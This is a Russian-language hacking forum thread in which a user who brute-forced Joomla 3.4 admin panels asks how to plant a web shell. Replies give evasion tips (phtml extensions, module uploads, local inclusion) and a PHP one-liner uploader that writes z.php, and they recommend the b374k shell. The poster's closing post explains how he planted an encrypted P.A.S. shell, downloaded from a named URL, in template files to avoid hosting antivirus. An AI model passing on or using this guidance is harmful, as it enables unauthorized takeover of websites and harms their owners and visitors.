ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.05.2015, 15:14
|
|
Новичок
Регистрация: 24.03.2014
Сообщений: 21
Провел на форуме:
5126
Репутация:
0
|
|
Сообщение от mazaxaka
↑
а каким способом получил админки? если через дырку то пробуй через нее залить
через брут
|
|
|
10.05.2015, 15:16
|
|
Новичок
Регистрация: 24.03.2014
Сообщений: 21
Провел на форуме:
5126
Репутация:
0
|
|
Сообщение от winstrool
↑
А через шаблон как именно вы заливаитесь? через бегдор или уплодером? уверены ли вы, что вставив свой код, не нарушили структуру кода? при заливке попробуйте менять расширения шелла например на phtml, бывает в корне htaccess пропускает только индексный php, так же можно попробовать через установку модулей, а потом смотреть свой шелл в tmp, так же в зависимости от установленных компонентов из админки можно реализовать локальный инклуд
Через аплоуд или изменяю код файла, когда-то работало, может и нарушаю...
Сейчас попробую через модуль
|
|
|
|
10.05.2015, 15:22
|
|
Новичок
Регистрация: 24.03.2014
Сообщений: 21
Провел на форуме:
5126
Репутация:
0
|
|
Через модуль тоже борода, устанавливает без файла шела...или это хостинг такой (Ukraine.com.ua) или Джумла. Я читал, что джумла просто палит код шела и удаляет его автоматом...у меня обычный WCO, возможно в этом проблема? Если у кого другие шелы? Вообще кто-то ломал джумлу 3.4, а то тупо получается админки есть, а шел залить не могу...
|
|
|
|
10.05.2015, 17:54
|
|
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361
Репутация:
1549
|
|
потому, что там стоит антивирус, очевидно, который проверяет это дело на уровне хостинга. Не думаю, что паблик шеллы будут работать. Пробуйте простенькие бекдоры, только с php-консолькой, вам же больше ничего не нужно, в принципе.
|
|
|
|
10.05.2015, 20:58
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
|
|
|
|
14.05.2015, 03:44
|
|
Новичок
Регистрация: 31.10.2012
Сообщений: 19
Провел на форуме:
3698
Репутация:
2
|
|
да ты не пихай туда шелл
запихай оболочку простую типа
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_FILE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'__z'[/COLOR][COLOR="#007700"]]))[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'__z'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'z.php'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
а потом через неё зальешь шелл |
|
|
|
14.05.2015, 04:01
|
|
Участник форума
Регистрация: 30.05.2011
Сообщений: 281
Провел на форуме:
57683
Репутация:
39
|
|
Если PHP вообще заливается, то попробуй как-то так, что бы сервак сам затянул шелл.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
А вообще, если всо и пас шеллы палятся попробуй b374k очень часто меня выручал, когда все остальные не работали или не проливались. |
|
|
|
15.05.2015, 12:37
|
|
Новичок
Регистрация: 24.03.2014
Сообщений: 21
Провел на форуме:
5126
Репутация:
0
|
|
УРАААА, спасибо огромное, наконец-то, оказывается все просто.
1. Отключаем антивирус у себя на компе (у меня дурака был включен, он тоже блочил много чего)
2. http://profexer.name/pas/download.php - берем тут P.A.S шелл, при этом ставим свой пароль + он криптуется.
3. Тупо заливаем в шаблоны - выбираем шаблон и любой файл php, все работает просто чудесно и не палится.
Столько времени потратил, но разобрался. При этом WCO почему то банится и другие шеллы, которые пробовал.
Тема закрыта, всем спасибо)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
